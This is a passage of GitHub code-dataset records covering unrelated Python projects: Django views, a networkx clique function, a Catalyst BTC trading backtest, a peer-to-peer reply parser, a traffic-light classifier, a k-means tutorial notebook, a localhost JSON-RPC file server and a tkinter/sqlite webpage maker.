Product2.objects.filter(id=dk).all()\n\n    return render(request, 'product2.html', {\n        'products2': products2,\n\n    })\n\ndef productview3(request, sk):\n    products3 = Product3.objects.filter(id=sk).all()\n\n    return render(request, 'product3.html', {\n        'products3': products3,\n\n    })\n\n\ndef productview4(request, lk):\n    products4 = Product4.objects.filter(id=lk).all()\n\n    return render(request, 'product4.html', {\n        'products4': products4\n    })\n\ndef producttopview(request, id):\n    producttop = ProductTop.objects.filter(id=id).all()\n\n    return render(request, 'producttop.html', {\n        'producttop': producttop\n    })\n\ndef products(request):\n    products1 = Product1.objects.all()\n    products2 = Product2.objects.all()\n    products3 = Product3.objects.all()\n    products4 = Product4.objects.all()\n    producttop = ProductTop.objects.all()\n\n    return render(request, 'products.html', {\n        'products1': products1,\n        'products2': products2,\n        'products3': products3,\n        'products4': products4,\n        'producttop': producttop\n\n    })\n\n\ndef productbottom(request):\n    return render(request, 'product4bottom.html')\n\n\n\n","repo_name":"Umar23A/ctradegroup","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28460510631","text":"from networkx.algorithms.community import k_clique_communities as kcc_one\nimport networkx as nx\n\n\ndef k_clique(g):\n    \"\"\"\n    :param g: graph G\n    :return: set(result_all): list of communities\n    \"\"\"\n    \"\"\"Community partitioning algorithm written as a 3-clique --> 2-clique --> 1-clique cascade\"\"\"\n    G = nx.Graph(g)\n    result_all = []\n    kcc_temp_1 
= list(list(val) for val in kcc_one(G, 3))\n result_all.extend(kcc_temp_1)\n test1_clique = []\n for val in kcc_temp_1:\n test1_clique.extend(val)\n G.remove_nodes_from(list(set(test1_clique)))\n kcc_temp_2 = list(list(val) for val in kcc_one(G, 2))\n result_all.extend(kcc_temp_2)\n test2_clique = []\n for val in kcc_temp_2:\n test2_clique.extend(val)\n G.remove_nodes_from(list(set(test2_clique)))\n for val in G.nodes():\n result_all.append(val)\n return result_all\n","repo_name":"Night-Quiet/Theme-Evolution","sub_path":"function/common/k_clique.py","file_name":"k_clique.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22503990324","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport joblib\nfrom hmmlearn.hmm import GaussianHMM\nimport datetime\nimport seaborn as sns\n\nfrom catalyst import run_algorithm\nfrom catalyst.api import (record, symbol, order_target_percent, date_rules, time_rules, get_datetime)\n\ndef warn(*args, **kwargs):\n pass\n\nimport warnings\nwarnings.warn = warn\n\n# Normalized st. deviation\ndef std_normalized(vals):\n return np.std(vals) / np.mean(vals)\n\n# Ratio of diff between last price and mean value to last price\ndef ma_ratio(vals):\n return (vals[-1] - np.mean(vals)) / vals[-1]\n\n# z-score for volumes\ndef values_deviation(vals):\n return (vals[-1] - np.mean(vals)) / np.std(vals)\n\ndef add_to_log(file, text):\n with open(file, 'a') as f:\n f.write(text + '\\n') \n\ndef initialize(context):\n context.asset = symbol('btc_usd')\n context.leverage = 1.0\n\n context.std_period = 10\n context.ma_period = 10\n context.price_deviation_period = 10\n context.volume_deviation_period = 10\n context.n_periods = 5 + int(np.max([context.std_period, context.ma_period,\n context.price_deviation_period, context.volume_deviation_period]))\n context.tf = '1440T'\n\n context.model = joblib.load('quandl_BITFINEX_BTCUSD_final_model.pkl')\n context.cols_features = ['last_return', 'std_normalized', 'ma_ratio', 'price_deviation', 'volume_deviation']\n context.long_states = [2]\n context.random_states = [1]\n context.short_states = [0]\n\n context.set_commission(maker = 0.001, taker = 0.002)\n context.set_slippage(slippage = 0.0005)\n context.set_benchmark(context.asset)\n\ndef handle_data(context, data):\n current_date = get_datetime().date()\n current_time = get_datetime().time()\n\n # Just one time in a day (first minute)\n if current_time.hour == 0 and current_time.minute == 0 and current_time.second == 0:\n prices = pd.DataFrame()\n volumes = pd.DataFrame()\n\n try:\n prices = data.history(context.asset,\n fields = 'price',\n bar_count = context.n_periods,\n frequency = context.tf)\n\n volumes = data.history(context.asset,\n fields = 'volume',\n bar_count = context.n_periods,\n frequency = context.tf)\n except:\n print('NO DATA')\n\n if prices.shape[0] == context.n_periods and volumes.shape[0] == context.n_periods:\n features = pd.DataFrame()\n features['price'] = prices\n features['volume'] = volumes\n features['last_return'] = features['price'].pct_change()\n features['std_normalized'] = features['price'].rolling(context.std_period).apply(std_normalized)\n features['ma_ratio'] = features['price'].rolling(context.ma_period).apply(ma_ratio)\n features['price_deviation'] = features['price'].rolling(context.price_deviation_period).apply(values_deviation)\n features['volume_deviation'] = 
features['volume'].rolling(context.volume_deviation_period).apply(values_deviation)\n\n state = context.random_states[0]\n if features.dropna().shape[0] == (context.n_periods - context.ma_period + 1):\n state = int(context.model.predict(features[context.cols_features].dropna())[-1])\n else:\n print('PROBLEM: features dataframe is too small')\n\n print('State on ' + str(current_date) + ' ' + str(current_time) + ': ' + str(state))\n \n print('Amount on ' + str(current_date) + ' ' + str(current_time) + ': ' + str(context.portfolio.positions[context.asset].amount))\n print(prices.dropna())\n print(volumes.dropna())\n\n if context.portfolio.positions[context.asset].amount <= 0 and state in context.long_states:\n print('LONG on ' + str(current_date) + ' ' + str(current_time))\n order_target_percent(context.asset, 1.0 * context.leverage)\n context.best_price_ts = data.current(context.asset, 'close')\n\n if context.portfolio.positions[context.asset].amount != 0 and state in context.random_states:\n print('CLOSE on ' + str(current_date) + ' ' + str(current_time))\n order_target_percent(context.asset, 0.0)\n\n if context.portfolio.positions[context.asset].amount >= 0 and state in context.short_states:\n print('SHORT on ' + str(current_date) + ' ' + str(current_time))\n order_target_percent(context.asset, -1.0 * context.leverage) \n context.best_price_ts = data.current(context.asset, 'close') \n\n record(price = prices[-1],\n state = state,\n amount = context.portfolio.positions[context.asset].amount)\n\n \ndef analyze(context, perf):\n sns.set()\n\n # Summary output\n print(\"Total return: \" + str(perf.algorithm_period_return[-1]))\n print(\"Sortino coef: \" + str(perf.sortino[-1]))\n print(\"Max drawdown: \" + str(np.min(perf.max_drawdown[-1])))\n print(\"alpha: \" + str(perf.alpha[-1]))\n print(\"beta: \" + str(perf.beta[-1]))\n\n f = plt.figure(figsize = (7.2, 7.2))\n\n # Plot return\n ax1 = f.add_subplot(211)\n ax1.plot(perf.algorithm_period_return, 'blue')\n ax1.plot(perf.benchmark_period_return, 'red')\n ax1.legend()\n ax1.set_title(\"Returns\")\n ax1.set_xlabel('Time')\n ax1.set_ylabel('Value')\n\n # Plot state\n ax2 = f.add_subplot(212, sharex = ax1)\n ax2.plot(perf.state, 'grey')\n ax2.set_title(\"State\")\n ax2.set_xlabel('Time')\n ax2.set_ylabel('Value')\n\n plt.tight_layout()\n plt.show()\n\n\nrun_algorithm(\n capital_base = 100000,\n data_frequency = 'minute',\n initialize = initialize,\n handle_data = handle_data,\n analyze = analyze,\n exchange_name = 'bitfinex',\n quote_currency = 'usd',\n start = pd.to_datetime('2018-1-1', utc = True),\n end = pd.to_datetime('2019-5-22', utc = True))\n\n","repo_name":"lamres/hmm_market_behavior","sub_path":"hmm_market_behavior_following_btcusd_catalyst.py","file_name":"hmm_market_behavior_following_btcusd_catalyst.py","file_ext":"py","file_size_in_byte":5957,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"68"} +{"seq_id":"17720148057","text":"from django.contrib import admin\nfrom .models import Codes\n\n\nclass CodesAdmin(admin.ModelAdmin):\n list_display = ['id', 'prod', 'serialNum', 'code', 'loadDate', 'ignor', 'sold', 'soldDate', 'order']\n list_editable = ['ignor', 'sold']\n list_filter = ['prod', 'order', 'code']\n\n\nadmin.site.register(Codes, CodesAdmin)\n","repo_name":"MaxCzech/itstep","sub_path":"codes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} 
+{"seq_id":"12416525227","text":"from LibPeer.Formats.BinaryAddress import BinaryAddress\n\nimport queue\nimport struct\nimport uuid\nimport msgpack\n\nclass Reply:\n def __init__(self, peer: BinaryAddress, data: bytes):\n self.peer = peer\n self.token = None\n\n self._has_object = False\n self._is_complete = False\n\n self._object_data = b\"\"\n self._object_data_size = 0\n self._binary_data = queue.Queue()\n self._binary_data_size = 0\n self._binary_data_received = 0\n self._binary_data_read = 0\n self._received_binary_size = False\n\n\n # Read header information\n self._object_data_size = struct.unpack(\"!I\", data[:4])[0]\n self.token = uuid.UUID(bytes=data[4:20])\n\n # Pass the rest into _receive\n self._receive(data[20:])\n\n\n def _receive(self, data: bytes):\n if(len(self._object_data) < self._object_data_size):\n # Figure how much more we need to read\n data_left = self._object_data_size - len(self._object_data)\n\n # Read up to that amount\n obj_data = data[:data_left]\n\n # Catch any leftovers\n leftovers = data[data_left:]\n\n # Add new data to buffer\n self._object_data += obj_data\n\n # Run any leftovers through this function\n if(len(leftovers) > 0):\n self._has_object = True\n return self._receive(leftovers)\n\n elif(not self._received_binary_size):\n # Get the binary size\n self._binary_data_size = struct.unpack(\"!Q\", data[:8])[0]\n\n # Mark size as received\n self._received_binary_size = True\n\n # Get leftovers\n leftovers = data[8:]\n\n # Run any leftovers through this function\n if(len(leftovers) > 0):\n return self._receive(leftovers)\n \n elif(self._binary_data_size == 0):\n self._is_complete = True\n\n elif(self._binary_data_received < self._binary_data_size):\n # Figure how much more we need to read\n data_left = self._binary_data_size - self._binary_data_received\n\n # Read up to that amount\n bin_data = data[:data_left]\n\n # Catch any leftovers\n leftovers = data[data_left:]\n\n # Update received amount\n self._binary_data_received += len(bin_data)\n\n # Add to queue\n self._binary_data.put(bin_data)\n\n if(self._binary_data_size <= self._binary_data_received):\n self._is_complete = True\n\n # Return leftovers\n if(len(leftovers) > 0):\n return leftovers\n\n\n def get_object(self, encoding=\"utf-8\"):\n \"\"\"Returns the object sent in the reply\"\"\"\n return msgpack.unpackb(self._object_data, encoding=encoding)\n\n\n def read(self):\n \"\"\"Reads all buffered data received so far\"\"\"\n # Hold data\n data = b\"\"\n\n while self._binary_data.qsize() != 0:\n # Get data from fifo (exception if no data)\n hunk = self._binary_data.get_nowait()\n # Buffer data\n data += hunk\n\n self._binary_data_read += len(data)\n \n return data\n\n\n def read_all(self):\n \"\"\"Reads all remaining data from the data part of the reply\"\"\"\n data = b\"\"\n\n # Calculate the amount of data that has to be read before we are done reading\n expected_size = self._binary_data_size - self._binary_data_read\n\n while len(data) != expected_size:\n # Read more data\n data += self._binary_data.get()\n\n self._binary_data_read += len(data)\n return data\n\n\n @property\n def transfer_information(self):\n \"\"\"Tuple containing information on the progress of the transfer of the binary data section of the reply.\n In order, it contains data size, data received, data read, fraction of data received, fraction of data read.\"\"\"\n return (self._binary_data_size, self._binary_data_received, self._binary_data_read, self._binary_data_received / float(self._binary_data_size), 
self._binary_data_read / float(self._binary_data_size))","repo_name":"Tilo15/LibPeer-Python","sub_path":"LibPeer/Interfaces/SODI/Reply.py","file_name":"Reply.py","file_ext":"py","file_size_in_byte":4194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24522986028","text":"from styx_msgs.msg import TrafficLight\nimport cv2\nimport tensorflow as tf\nimport numpy as np\n\nclass TLClassifier(object):\n def __init__(self):\n self.model = None\n self.width = 0\n self.height = 0\n self.channels = 3\n\n def setup_classifier(self, model, width, height, channels=3):\n self.width = width\n self.height = height\n self.model = model\n self.channels = channels\n # necessary work around to avoid troubles with keras\n self.graph = tf.get_default_graph()\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n\n Args:\n image (cv::Mat): image containing the traffic light\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n resized = cv2.resize(image, (self.width,self.height))\n resized = resized / 255.; # Normalization\n # necessary work around to avoid troubles with keras\n with self.graph.as_default():\n predictions = self.model.predict(resized.reshape((1, self.height, self.width, self.channels)))\n color = predictions[0].tolist().index(np.max(predictions[0]))\n tl = TrafficLight()\n tl.state = color\n return tl.state\n","repo_name":"ericlavigne/CarND-Capstone-Wolf-Pack","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"68"} +{"seq_id":"4577416072","text":"import argparse, socket\nimport sys\nimport time, os, glob\nfrom jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer\n\ndef ngelist1():\n print(\"Ngelist...\")\n daftar=glob.glob(\"./*\")\n isi=\" \"\n for i in daftar:\n isi += i + \"\\n\"\n print(\"Udah ngelistnya yeay\")\n return isi\n\ndef ngelist2(String):\n print(\"Ngelist...\")\n daftar=glob.glob(String)\n isi=\" \"\n for i in daftar:\n isi += i + \"\\n\"\n print(\"Udah ngelistnya yeay\")\n return isi\n\ndef ngitung(String):\n print(\"Ngitung...\")\n daftar=glob.glob(String)\n count=0\n for i in daftar:\n count+=1\n print(\"Udah ngitungnya yeay\")\n return count\n\ndef ngambil(String):\n print('Ngambil...')\n msg=String.split()\n tempat= ' '.join(msg[:-1])\n tempat2=[tempat, msg[-1]]\n msg2 = '/'.join(tempat2)\n f=open(msg2, \"rb\")\n b=f.read()\n tulis= \"fetch: \" + tempat + \"\\nsize: \" + str(len(b)) + \"\\nlokal: \" + msg[-1]\n print(\"Udah ngambilnya yeay\")\n return tulis\n\ndef bikin(String):\n print('Bikin...')\n msg=String.split()\n tempat= ' '.join(msg[1:])\n tempat2=[tempat, msg[0]]\n msg2 = '/'.join(tempat2)\n f=open(msg2, \"x\")\n f.close()\n tulis= \"put: \" + tempat + \"\\nlokal: \" + msg[0]\n print(\"Udah bikinnya yeay\")\n return tulis\n\ndef tutup():\n print(\"Shuting down...\")\n sys.exit(0)\n\ndef main():\n server = SimpleJSONRPCServer(('localhost', 7002))\n server.register_function(ngelist1)\n server.register_function(ngelist2)\n server.register_function(ngambil)\n server.register_function(ngitung)\n server.register_function(bikin)\n server.register_function(tutup)\n print(\"Starting server\")\n server.serve_forever()\n sys.exit(0)\n\nif __name__ == '__main__':\n 
main()","repo_name":"reyhannaufal/network-programming","sub_path":"tugas-4/json_server.py","file_name":"json_server.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"34964511491","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Aprendizado de máquina - II\n\n# No capítulo anterior, aprendemos a resolver um problema de classificação, que recai na classe de aprendizado de máquina supervisionado. Neste capítulo, estudaremos o aprendizado de máquina não supervisionado resolvendo um problema de _clusterização_.\n# \n# Como já sabemos, no aprendizado não supervisionado, procuramos por \"estruturas escondidas\" em um banco de dados não rotulado. Enquanto no aprendizado supervisionado é possível medir erros entre os valores esperados e os previstos, no aprendizado não supervisionado os algoritmos devem apelar para as exclusivamente para as _features_ do banco de dados e categorizá-las aplicando algum critério estatístico ou geométrico.\n\n# ## Breves comentários sobre aprendizagem\n\n# A _aprendizagem_ é um conceito que pode ser quantificado por meio de erros. Durante o treinamento de um algoritmo de _machine learning_, dois erros são estimados. \n# \n# O primeiro é o _erro de treinamento_, que mede a discrepância entre as amostras observadas e as amostras apenas do conjunto de treinamento. No problema de classificação por exemplo, o erro de treinamento $e_i = e(x_i,y_i)$ para cada observação $x_i$ e resposta $y_i$ poderia ser calculado usando uma função indicadora que contaria todas as amostras corretamente calculadas. Ou seja,\n# \n# $$e_i = e(x_i,y_i) =\n# \\begin{cases}\n# 1, \\ \\ \\text{se} \\ \\ h(x_i) = y_i \\\\\n# 0, \\ \\ \\text{caso contrário}\n# \\end{cases}$$\n# \n# O erro de treinamento seria então definido por \n# \n# $$E_{tr} = \\frac{ \\sum_{i=1}^n e_i }{n},$$\n# \n# para $n$ amostras do conjunto de treinamento.\n# \n# O segundo erro é o _erro de teste_ ou _erro de generalização_, que é um erro médio calculado sobre os dados não vistos. Este erro é chamado de $E_gen$.\n# \n# Em geral, $E_{gen} \\geq E_{tr}$ e a _aprendizagem_ é atingida quando $E_{gen}$ é o menor possível. Para tanto, intuitivamente, ou $E_{tr}$ deve tender a zero, ou $E_{gen}$ deve ser aproximar de $E_{tr}$. \n# \n# Assim, a aprendizagem é o resultado de $E_{tr} \\to 0$, ou $E_{gen} \\approx E_{tr}$. Isto é, um excelente treinamento deve conduzir a um modelo de aprendizagem robusto.\n# \n# A aprendizagem é medida por meio de _curvas de aprendizagem_, que possuem aparência assintótica. Modelos com alto desempenho durante a etapa de treinamento que generalizam mal tendem a sofrer um _superajustamento_ (_overfitting_). Modelos com baixo desempenho já durante a etapa de treinamento tendem a sofrer um _subajustamento_ (_underfitting_). Ambos os comportamentos são percebidos nas curvas de aprendizagem. A correção de _overfitting_ ou _underfitting_ pode ser feita com várias técnicas. Uma delas é a _regularização_.\n\n# ## Treinamento, validação e generalização\n# \n# Vale fazer um breve adendo sobre esses três conceitos:\n# \n# - _treinamento_: etapa em que se verifica o desempenho de um modelo a partir de uma classe de modelos.\n# - _validação_: etapa em que se selecionam os melhores hiperparâmetros do modelo tendo por base estimativas do erro de generalização. 
\n# - _generalização (ou teste)_: etapa exclusiva em que se avalia o desempenho final do modelo sobre um conjunto de dados que nunca deve ser usado nas etapas de treinamento ou validação. \n# \n# O ajustamento dos melhores parâmetros durante a etapa de validação pode ser realizado por várias técnicas. Uma das mais conhecidas é a _validação cruzada_ (_cross validation_). \n\n# ## Estudo de caso: clusterização de dados aleatórios\n# \n# Estudaremos um problema de clusterização como exemplo de aplicação do aprendizado de máquina não supervisionado. Relembre que nesta classe de aprendizado, não há como mensurar erros no cálculo de desempenho do modelo, visto que os dados fornecidos não são rotulados. Então, a única maneira de explicar os dados dá-se por critérios estatísticos, geométricos ou de similaridade.\n# \n# ### O que é clusterização? \n# \n# A clusterização é baseada no particionamento dos dados não rotulados em subconjuntos disjuntos chamados _clusters_, de forma que os elementos de um cluster sejam altamente similares (alta _similaridade intra-classe_) e os elementos de clusters distintos possuam baixa similaridade com os demais clusters (baixa _similaridade inter-classe_).\n# \n# Devido à arbitrariedade com que os dados podem ser agrupados em _clusters_, a clusterização tende a ser subjetiva, e a qualidade depende da aplicação e da avaliação do analista.\n\n# ### Similaridade e distância\n# \n# Estabelecer \"similaridade\" entre instâncias pode ser um pouco difícil. Em problemas de clusterização, uma forma de aproximar essa ideia é usar distâncias. Uma fórmula generalizada é a _distância de Minkowski_, dada por\n# \n# $$d({\\bf x},{\\bf y}) = \\left( \\sum_{i=1}^n | x_i - y_i |^p \\right)^{1/p},$$\n# \n# com ${\\bf x}$ e ${\\bf y}$ vetores do espaço $\\mathbb{R}^n$ e $p \\in \\mathbb{R}$ um parâmetro. Dependendo do valor de $p$, a fórmula se reduz a outras distâncias conhecidas:\n# \n# - Se $p = 2$, temos a _distância Euclidiana_;\n# - Se $p = 1$, temos a _distância de Manhattan_ (ou _distância do taxista_);\n# - Se $p = \\infty$, temos a _distância de Chebyshev_ (ou _distância do máximo_), definida por $\\max \\{ | x_i - y_i | \\}$, isto é, a componente com o maior módulo.\n# \n# ```{hint}\n# Para saber mais sobre outras definições de distância, veja a documentação da função \n# `scipy.spatial.distance` do módulo Scipy.\n# ```\n\n# ### O algoritmo _k-means_\n# \n# _k-means_ é um algoritmo classificado como de _partição rígida_ que atribui cada elemento no espaço de _features_ a um único cluster. Os passos do algoritmo são: \n# \n# 1. Inicialize o valor _k_ de clusters desejados;\n# 2. Inicialize os centroides dos _k clusters_;\n# 3. Atribua cada uma das _n_ amostras de dados ao cluster cujo centroide está mais próximo da amostra;\n# 4. Redefina os _k_ centroides como as médias das amostras atribuídas a cada cluster;\n# 5. Se nenhuma amostra migrar de um cluster para outro na última iteração, pare.
Caso contrário, retorne ao passo 3.\n# \n# Vejamos um exemplo sobre um conjunto de dados aleatórios.\n\n# In[1]:\n\n\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\n# In[2]:\n\n\n# cria dados aleatórios\nN = 40\n\nX1 = 1.25*np.random.randn(N,2)\nX2 = 5 + 1.5*np.random.randn(N,2)\nX3 = [8,3] + 1.2*np.random.randn(N,2)\n\nX = np.concatenate([X1,X2,X3])\n\nX.shape\n\n\n# Vamos criar rótulos para os 3 grupos e mostrar a clusterização segundo o que nós pré-determinamos e o que, de fato, é passado como entrada para o algoritmo.\n\n# In[3]:\n\n\n# cria labels\nc = np.concatenate([np.full(N,1), np.full(N,2), np.full(N,3)])\n\nplt.figure(figsize=(10,4))\nplt.subplot(1,2,1)\nplt.scatter(X1[:,0],X1[:,1],color='r')\nplt.scatter(X2[:,0],X2[:,1],color='g')\nplt.scatter(X3[:,0],X3[:,1],color='b')\nplt.title('Dados rotulados')\n\nplt.subplot(1,2,2)\nplt.scatter(X[:,0],X[:,1],color='k')\nplt.title('Dados \"vistos\" pelo algoritmo');\n\n\n# Usa _k-means_ com inicialização de 3 clusters.\n\n# In[4]:\n\n\nfrom sklearn import cluster\n\n# no. de clusters\nk = 3\n\n# ajusta parâmetros de aprendizagem\ncfit = cluster.KMeans(init='random',n_clusters=k)\ncfit.fit(X)\n\n\n# In[5]:\n\n\n# labels do ajuste\nprint(cfit.labels_)\n\n\n# In[6]:\n\n\n# plota comparativo de labels (original x ajuste)\ncl = cfit.labels_ + 1\n\nplt.scatter(X[cl==1,0], X[cl==1,1],color='r')\nplt.scatter(X1[:,0],X1[:,1],color='gray',edgecolor='k',alpha=0.4)\n\nplt.scatter(X[cl==2,0], X[cl==2,1],color='g')\nplt.scatter(X2[:,0],X2[:,1],color='gray',edgecolor='c',alpha=0.4)\n\nplt.scatter(X[cl==3,0], X[cl==3,1],color='b')\nplt.scatter(X3[:,0],X3[:,1],color='gray',edgecolor='m',alpha=0.4);\n\nplt.title('Rótulos originais x rótulos do ajuste');\n\n\n# Criando pontos novos no espaço que cobre os dados originais.
\n\n# In[7]:\n\n\n# gera \"grade\" 2D de pontos \n# em [-5,15] x [-5,15]\nx = np.linspace(-5,15,200)\nXX,YY = np.meshgrid(x,x)\nsz = XX.shape\n\n# concatena\ndata = np.c_[XX.flatten(), YY.flatten()]\n\n# predição\nZ = cfit.predict(data)\n\n\n# Verificando a partição do espaço determinada pelo algoritmo x dados originais.\n\n# In[8]:\n\n\n# partições do espaço\nplt.imshow(Z.reshape(sz), interpolation='bilinear', \n           origin='lower', extent=(-5,15,-5,15), \n           alpha=0.3,vmin=0,vmax=k-1)\n\n\nplt.scatter(X[c==1,0], X[c==1,1],color='r')\nplt.scatter(X[c==2,0], X[c==2,1],color='g')\nplt.scatter(X[c==3,0], X[c==3,1],color='b')\nplt.title('Partições do espaço');\n\n\n# Então, comparamos o resultado da clusterização com os dados originais.\n\n# In[9]:\n\n\nplt.figure(figsize=(10,4))\n\nplt.subplot(1,2,1)\n\n# overlay\nplt.imshow(Z.reshape(sz), interpolation='bilinear', \n           origin='lower', extent=(-5,15,-5,15), \n           alpha=0.3,vmin=0,vmax=k-1)\n\n# original\nplt.title('Rótulos originais')\nplt.scatter(X[c==1,0], X[c==1,1],color='r')\nplt.scatter(X[c==2,0], X[c==2,1],color='g')\nplt.scatter(X[c==3,0], X[c==3,1],color='b')\n\nplt.subplot(1,2,2)\n\n# overlay\nplt.imshow(Z.reshape(sz), interpolation='bilinear', \n           origin='lower', extent=(-5,15,-5,15), \n           alpha=0.3,vmin=0,vmax=k-1)\n\n# clusterização\nplt.title('Rótulos da clusterização')\nplt.scatter(X[cl==1,0], X[cl==1,1],color='r')\nplt.scatter(X[cl==2,0], X[cl==2,1],color='g')\nplt.scatter(X[cl==3,0], X[cl==3,1],color='b');\n\n\n# ## Métricas de qualidade para clusterização\n# \n# Vejamos brevemente uma métrica conhecida para comparar resultados de clusterização.\n\n# ### Coeficiente de Silhueta\n# \n# O _coeficiente de silhueta_ $s$ é um valor atribuído a cada ponto de um cluster para medir a \"silhueta\" de seu cluster. Em linhas gerais, este coeficiente é usado para definir se houve uma \"boa\" clusterização do dataset. Matematicamente,\n# \n# $$s(i) = \\frac{b(i) - a(i)}{\\max \\{a(i),b(i)\\}},$$\n# \n# onde \n# \n# - $a(i)$ é a distância média intra-cluster da amostra $i$, isto é, a distância média da amostra $i$ a todas as suas \"irmãs\", pertencentes ao seu mesmo _cluster_. Este valor mede a dissimilaridade de $i$ em relação às suas amostras \"irmãs\".\n# \n# - $b(i)$ é a distância média inter-cluster da amostra $i$, considerando o cluster _A_ ao qual ela pertence e o _cluster_ _B_ mais próximo de _A_. Este valor mede a dissimilaridade de $i$ em relação a todas as amostras em _B_.\n# \n# O valor de $s$ varia no intervalo [-1,1] e a interpretação é a seguinte. Quando $s=-1$, a clusterização é considerada incorreta; quando $s=1$, a clusterização está muito densa. Quando $s \\approx 0$, há _clusters_ que se sobrepõem.\n\n# Vamos calcular $s$ para o nosso exemplo.\n\n# In[10]:\n\n\nfrom sklearn import metrics\n\nss = metrics.silhouette_samples(X,cl,metric='euclidean')\n\nssm = metrics.silhouette_score(X,cl,metric='euclidean')\n\n\n# In[11]:\n\n\nplt.title('Coeficiente de silhueta por amostra')\nplt.plot(ss,'+');\nplt.plot(np.arange(len(ss)),np.full(np.shape(ss),ssm),':',label='s médio');\nplt.legend();\n\n\n# ### Análise de silhueta\n# \n# O plot de silhueta permite que busquemos o número adequado de clusters a partir de uma análise gráfica dos valores de $s$.
Em outras palavras, a análise de silhueta é usada para escolher um valor ótimo para o número de clusters a serem determinados.\n\n# In[12]:\n\n\nimport matplotlib.cm as cm\n\nfig, (ax1,ax2) = plt.subplots(1,2)\nfig.set_size_inches(8, 4)\n\nax1.set_xlim([-0.2,1])\nax1.set_ylim([0, len(X) + (k + 1) * 10])\n\n\ny_lower = 10\nfor i in range(1,k+1):\n    ssi = ss[cl == i] # i-th cluster s\n    ssi.sort()\n    sizei = ssi.shape[0]\n    y_upper = y_lower + sizei\n    \n    color = cm.nipy_spectral(float(i) / k)\n    ax1.fill_betweenx(np.arange(y_lower, y_upper),0,\n                      ssi,facecolor=color, edgecolor=color,\n                      alpha=0.7)\n    ax1.text(-0.05, y_lower + 0.5 * sizei, str(i))\n    y_lower = y_upper + 10\n    \nax1.set_title(f'Plot de silhueta: {k} clusters')\nax1.set_xlabel(\"s\")\nax1.set_ylabel(\"Rótulos dos clusters\") \n    \nax1.axvline(x=ssm, color=\"red\", linestyle=\"--\")\n    \ncolors = cm.nipy_spectral(cl.astype(float)/k)\nax2.scatter(X[:, 0],X[:, 1],marker='o', s=30, lw=0, alpha=1.0,\n            c=colors, edgecolor='k') \ncentroides = cfit.cluster_centers_\nax2.scatter(centroides[:, 0], centroides[:, 1], marker='o',\n            c=\"white\", alpha=1, s=200, edgecolor='k')\n\nfor i, c in enumerate(centroides):\n    \n    ax2.scatter(c[0], c[1], marker=f'$%d$' % (i+1), alpha=1,\n                s=50, edgecolor='k')\n    \nax2.set_title(\"Clusters\") \nax2.set_xlabel(\"Feature #1\")\nax2.set_ylabel(\"Feature #2\")\nplt.suptitle((\"Análise de silhueta por k-means: %d clusters\" % k),\n             fontsize=12, fontweight='bold');\n\n\n# A análise de silhueta mostra que 3 clusters é um número adequado porque em todos eles há amostras com valor de $s$ acima da média. A espessura das silhuetas também ajuda a ter uma ideia do \"tamanho\" dos _clusters_.\n","repo_name":"gcpeixoto/ICD","sub_path":"_build/jupyter_execute/ipynb/14b-aprendizado-maquina-2.py","file_name":"14b-aprendizado-maquina-2.py","file_ext":"py","file_size_in_byte":12859,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"9373371337","text":"#Python3\n#The Tech Academy Python 73\n\nfrom tkinter import *\nfrom tkinter import ttk\nimport sqlite3\n\nclass makeWeb:\n\n\tdef __init__(self):\n\n\t\troot = Tk()\n\t\troot.wm_title(\"Make a Webpage\")\n\t\troot.minsize(width=300, height=200)\n\n\t\t#start a text box in GUI for name of website\n\t\tself.name = Entry(root)\n\t\tself.name.insert(0, 'Enter webpage name:')\n\t\tself.name.pack()\n\n\t\t#start a text box in GUI for body of website\n\t\tself.content = Entry(root)\n\t\tself.content.insert(0, 'Enter body content:')\n\t\tself.content.pack()\n\n\t\t#button to create webpage and add to database referenced to makewebpage method\n\t\tbutton = ttk.Button(root, text = \"Make a webpage and add to database!\",command = self.makeWebpage\n\t\t\t)\n\t\tbutton.pack()\n\n\n\t\tbutton2 = ttk.Button(root, text = \"Fetch all from database!\",command = self.querydatabase\n\t\t\t)\n\t\tbutton2.pack()\n\n\n\t\tconn = sqlite3.connect('webPages.db')\n\n\t\tc = conn.cursor()\n\n\t\tc.execute(\"CREATE TABLE IF NOT EXISTS webPages(content TEXT)\")\n\n\t\t#print everything in database\n\t\tc.execute(\"SELECT * FROM webPages\")\n\t\tallData = c.fetchall()\n\n\t\tself.webpageList = Listbox(root, width = 50, height = 30)\n\t\tself.webpageList.pack()\n\n\t\t#print everything that is stored in the database in a listbox\n\t\tfor row in allData:\n\t\t\tself.webpageList.insert(END, row)\n\n\t\tself.webpageList.pack()\n\n\t\tself.webpageList.bind('<<ListboxSelect>>', self.selectWebPage\n\t\t\t)\n\n\n\t\troot.mainloop()\n\n\tdef makeWebpage(self):\n\n\t\t#get name of website from entry box from GUI\n\t\tname
